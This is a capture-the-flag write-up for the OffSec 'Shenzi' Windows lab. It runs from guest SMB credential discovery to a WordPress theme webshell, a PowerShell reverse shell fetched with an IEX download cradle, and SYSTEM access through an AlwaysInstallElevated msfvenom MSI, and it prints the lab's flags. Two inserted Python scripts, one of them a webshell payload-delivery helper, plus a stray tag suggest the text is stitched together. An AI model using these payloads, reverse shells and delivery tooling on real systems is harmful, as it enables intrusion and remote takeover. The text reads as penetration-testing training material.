Shenzi
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.203.55
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-14 01:23 EST
Nmap scan report for 192.168.203.55
Host is up, received echo-reply ttl 125 (0.21s latency).
Scanned at 2025-11-14 01:24:00 EST for 202s
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.203.55/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.203.55/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| tls-alpn:
|_ http/1.1
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 125
3306/tcp open mysql syn-ack ttl 125 MariaDB 10.3.24 or later (unauthorized)
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
We have several open ports; we will go through them one by one.
FTP (21):
Anonymous FTP login was refused.
SMB (445):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u '' -p ''
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [-] shenzi\: STATUS_ACCESS_DENIED
A null session is denied, but the guest account is enabled:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u 'guest' -p ''
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [+] shenzi\guest:
Guest authentication succeeds.
Enumerate the shares:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ nxc smb 192.168.203.55 -u 'guest' -p '' --shares
SMB 192.168.203.55 445 SHENZI [*] Windows 10 / Server 2019 Build 19041 x64 (name:SHENZI) (domain:shenzi) (signing:False) (SMBv1:False)
SMB 192.168.203.55 445 SHENZI [+] shenzi\guest:
SMB 192.168.203.55 445 SHENZI [*] Enumerated shares
SMB 192.168.203.55 445 SHENZI Share Permissions Remark
SMB 192.168.203.55 445 SHENZI ----- ----------- ------
SMB 192.168.203.55 445 SHENZI IPC$ READ Remote IPC
SMB 192.168.203.55 445 SHENZI Shenzi READ
We have read access to a non-default share named Shenzi.
With smbclient we can authenticate as guest, list the files in the share, and download them.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ mkdir smb
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cd smb
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi/smb]
└─$ smbclient //192.168.203.55/Shenzi -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 11:45:09 2020
.. D 0 Thu May 28 11:45:09 2020
passwords.txt A 894 Thu May 28 11:45:09 2020
readme_en.txt A 7367 Thu May 28 11:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 11:45:09 2020
why.tmp A 213 Thu May 28 11:45:09 2020
xampp-control.ini A 178 Thu May 28 11:45:09 2020
12941823 blocks of size 4096. 4831147 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \passwords.txt of size 894 as passwords.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \readme_en.txt of size 7367 as readme_en.txt (7.8 KiloBytes/sec) (average 4.7 KiloBytes/sec)
getting file \sess_klk75u2q4rpgfjs3785h6hpipp of size 3879 as sess_klk75u2q4rpgfjs3785h6hpipp (4.0 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \why.tmp of size 213 as why.tmp (0.3 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \xampp-control.ini of size 178 as xampp-control.ini (0.2 KiloBytes/sec) (average 2.8 KiloBytes/sec)
None of the files were interesting except this one:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ cat passwords.txt
<snipped>
5) WordPress:
User: admin
Password: FeltHeadwallWight357
This looks like a set of credentials for the admin account of a WordPress site.
HTTP (80):

We are welcomed with the XAMPP default page.
I will run gobuster to discover hidden directories:
┌──(kali㉿kali)-[~/…/OffsecPG/Practice/Shenzi/smb]
└─$ gobuster dir -u http://192.168.203.55/ -w /usr/share/wordlists/dirb/big.txt -x php -t 40
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.203.55/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 1046]
/Index.php (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]
/aux (Status: 403) [Size: 1046]
/aux.php (Status: 403) [Size: 1046]
/cgi-bin/ (Status: 403) [Size: 1060]
/com1.php (Status: 403) [Size: 1046]
/com2 (Status: 403) [Size: 1046]
/com2.php (Status: 403) [Size: 1046]
/com1 (Status: 403) [Size: 1046]
/com3.php (Status: 403) [Size: 1046]
/com3 (Status: 403) [Size: 1046]
/com4 (Status: 403) [Size: 1046]
/com4.php (Status: 403) [Size: 1046]
/con (Status: 403) [Size: 1046]
/con.php (Status: 403) [Size: 1046]
/dashboard (Status: 301) [Size: 344] [--> http://192.168.203.55/dashboard/]
/examples (Status: 503) [Size: 1060]
/favicon.ico (Status: 200) [Size: 30894]
/img (Status: 301) [Size: 338] [--> http://192.168.203.55/img/]
/index.php (Status: 302) [Size: 0] [--> http://192.168.203.55/dashboard/]
/licenses (Status: 403) [Size: 1205]
<snipped>
/xampp (Status: 301) [Size: 340] [--> http://192.168.203.55/xampp/]
Progress: 40938 / 40938 (100.00%)
===============================================================
Finished
===============================================================
I tried a couple of other wordlists with no further results. The 403 responses for names such as aux, con and com1 are reserved Windows device names that Apache refuses to serve, not real directories.
Then I went back to the OffSec portal and unlocked one of the hints:

It says we should guess the root directory of the WordPress site.
OffSec often reuses the machine name in several places, as a username, a password, or, as here, a directory name: the WordPress root is /shenzi/ (confirmed later by the shell's working directory, C:\xampp\htdocs\shenzi):

Here we have the WordPress site.
Going to /wp-admin redirects us to the login form:

Enter the username and password we found earlier, admin:FeltHeadwallWight357.

We logged in successfully.

Exploitation:
From here, as admins, we can get command execution in two ways that I know of: 1. upload a malicious plugin and use it to run commands, or 2. add a single line of PHP to one of the theme's files and use that to get a reverse shell. I will use the latter: go to Appearance -> Theme Editor and pick one of the theme's PHP files. I chose error.php, the template rendered when a page fails to load, so the injected code runs whenever an error page is served. The line is a call to PHP's system() on a cmd GET parameter:

Scroll down and click Update File:

Now if we request any non-existent page, we see a PHP warning coming from the system() call, because the cmd parameter has not been supplied yet:

Add the cmd parameter and try any system command:

Nice, we have command execution.
Now I will prepare a PowerShell reverse shell from nishang, editing in my IP and port, and deliver it with a download cradle:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 shell.ps1
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ vim shell.p
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.195',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Set up a python3 web server and a netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
Then, through the webshell's cmd parameter, download the script straight into memory and run it with Invoke-Expression (IEX), so nothing touches the disk:
IEX(IWR -UseBasicParsing -Uri http://192.168.45.195/shell.ps1)
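Getting the cradle through the webshell in one piece is the fiddly part: the cmd parameter passes through URL decoding, PHP's system() and cmd.exe, each with its own quoting rules. The helper below is an added example, not part of the original write-up. It wraps the cradle as a PowerShell -EncodedCommand (base64 over UTF-16LE, which is what PowerShell expects) and percent-encodes the result into the cmd parameter, so spaces, quotes and slashes survive every hop. The webshell path does-not-exist under /shenzi/ is an assumption standing in for any non-existent page; the IP addresses and the cradle itself are the ones used above.

```python
import base64
import urllib.request
from urllib.parse import urlencode, urlsplit, parse_qs

# From the write-up: attacker host and the cradle that pulls shell.ps1.
CRADLE = "IEX(IWR -UseBasicParsing -Uri http://192.168.45.195/shell.ps1)"
# Assumed: any non-existent page under the WordPress root renders the edited
# template, so this path is hypothetical and only needs to 404 inside WordPress.
WEBSHELL_URL = "http://192.168.203.55/shenzi/does-not-exist"


def encode_powershell(command: str) -> str:
    """Build the argument for powershell.exe -EncodedCommand.

    PowerShell expects base64 over the UTF-16LE bytes of the script, without a
    byte-order mark.  Encoding sidesteps every quoting layer between the GET
    parameter, PHP's system() and cmd.exe.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell, to check what the target will actually run."""
    return base64.b64decode(encoded).decode("utf-16-le")


def staged_command(cradle: str = CRADLE) -> str:
    """The cmd.exe line the webshell executes: a hidden, profile-less
    PowerShell carrying the cradle as an encoded command."""
    return ("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
            + encode_powershell(cradle))


def build_webshell_url(base_url: str, cmd: str) -> str:
    """Attach cmd as a percent-encoded query parameter so spaces, '+', '/'
    and '=' in the command reach PHP's $_GET['cmd'] intact."""
    return f"{base_url}?{urlencode({'cmd': cmd})}"


def extract_cmd(url: str) -> str:
    """Recover the cmd parameter from a built URL (what PHP sees in $_GET)."""
    return parse_qs(urlsplit(url).query)["cmd"][0]


def run_through_webshell(cmd: str, base_url: str = WEBSHELL_URL, timeout: int = 10) -> str:
    """Send one command through the webshell and return the response body.

    system() output is embedded in the theme's error page HTML, so the caller
    still has to pick it out of the response.  Needs the target; not run offline.
    """
    with urllib.request.urlopen(build_webshell_url(base_url, cmd), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Paste this URL into the browser (or pass it to curl) while the listener runs.
    print(build_webshell_url(WEBSHELL_URL, staged_command()))
</test>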
We will get a hit to our webserver:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.203.55 - - [14/Nov/2025 02:01:55] "GET /shell.ps1 HTTP/1.1" 200 -
And we have a reverse shell as shenzi:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50440
PS C:\xampp\htdocs\shenzi> whoami
shenzi\shenzi
Post-Exploitation:
I will upload winPEAS to enumerate the system and look for a privilege-escalation vector (the target is x64 according to nmap, but the x86 build runs fine on it):
PS C:\Windows\Tasks> curl http://192.168.45.195/winPEASx86.exe -o winPEASx86.exe
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/13/2025 11:09 PM 10171904 winPEASx86.exe
Run it:
PS C:\Windows\Tasks> .\winPEASx86.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
<snipped>
Checking AlwaysInstallElevated
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
Both registry values are set to 1. When AlwaysInstallElevated is enabled in both HKLM and HKCU, the Windows Installer service installs any .msi package with SYSTEM privileges, even when a standard user starts the install; the policy has no effect if only one of the two hives sets it.
See the HackTricks page linked above for more background.
We can confirm the winPEAS result by querying the registry directly:
PS C:\Windows\Tasks> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Windows\Tasks> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
Now I will generate a .msi file and upload it to the target:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.195 LPORT=443 -f msi -o runme.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Saved as: runme.msi
Fetch it on the target from the web server:
PS C:\Windows\Tasks> dir
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/13/2025 11:40 PM 159744 runme.msi
-a---- 11/13/2025 11:09 PM 10171904 winPEASx86.exe
Start another netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
Run the installer with msiexec; with the policy in place, the Windows Installer service executes the payload as SYSTEM:
PS C:\Windows\Tasks> msiexec /quiet /qn /i C:\Windows\Tasks\runme.msi
Going back to our netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Shenzi]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.203.55] 50920
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
nt authority\system
We are SYSTEM.
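The both-hives rule that winPEAS applied above is worth keeping as a reusable check, since AlwaysInstallElevated=1 in only one hive is a common false positive that wastes a listener and a payload. The script below is an added example, not part of the original write-up: it parses reg query output for both hives and only reports the host as exploitable when HKLM and HKCU both hold 0x1. The sample outputs are constructed copies of the two queries above plus the disabled and missing cases; query_live() runs the real queries on a Windows host and is not exercised offline.

```python
import re
import subprocess
import sys
from typing import Optional, Tuple

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"

# Matches the value line reg.exe prints, e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
_VALUE_RE = re.compile(
    r"^\s*" + VALUE_NAME + r"\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$", re.MULTILINE)


def parse_dword(reg_output: str) -> Optional[int]:
    """Return the DWORD from `reg query` output, or None if the key or value is absent."""
    m = _VALUE_RE.search(reg_output)
    if not m:
        return None
    text = m.group(1)
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def is_exploitable(hklm_output: str, hkcu_output: str) -> Tuple[bool, str]:
    """Apply the rule Windows Installer uses: the policy is in effect only when
    both the machine hive and the user hive set the value to 1."""
    hklm, hkcu = parse_dword(hklm_output), parse_dword(hkcu_output)
    if hklm == 1 and hkcu == 1:
        return True, "HKLM and HKCU both set AlwaysInstallElevated=1; msiexec /i runs the package as SYSTEM"
    return False, f"HKLM={hklm} HKCU={hkcu}; policy not in effect, msiexec runs with the caller's rights"


def query_live() -> Tuple[bool, str]:
    """Run the two reg queries on a Windows host and evaluate them (not run offline)."""
    if not sys.platform.startswith("win"):
        raise RuntimeError("reg.exe is only available on Windows")
    outputs = []
    for hive in ("HKLM", "HKCU"):
        proc = subprocess.run(
            ["reg", "query", hive + "\\" + INSTALLER_KEY, "/v", VALUE_NAME],
            capture_output=True, text=True)
        outputs.append(proc.stdout + proc.stderr)  # a missing key is reported on stderr
    return is_exploitable(*outputs)


# Constructed sample outputs: the first two mirror the write-up's queries, the
# others are the cases where the policy is off in one hive or not set at all.
HKLM_ENABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_ENABLED = HKLM_ENABLED.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
HKCU_DISABLED = HKCU_ENABLED.replace("0x1", "0x0")
KEY_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    cases = {"both set": (HKLM_ENABLED, HKCU_ENABLED),
             "HKCU off": (HKLM_ENABLED, HKCU_DISABLED),
             "HKLM missing": (KEY_MISSING, HKCU_ENABLED)}
    for name, pair in cases.items():
        ok, why = is_exploitable(*pair)
        print(f"{name:12} -> {'EXPLOITABLE' if ok else 'no'}: {why}")
```

On the target the same decision is one line of PowerShell or two reg query calls, as shown above; the value of the script is on the attacker side, where reg output pasted from a shell can be checked before building and uploading a payload.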
Get the flags:
C:\WINDOWS\system32>type \Users\Administrator\Desktop\proof.txt
f526ab9a5ca67ea41c3dfd4892208d7d
C:\WINDOWS\system32>type \Users\shenzi\Desktop\local.txt
52eea052824fb47ad872425b98225970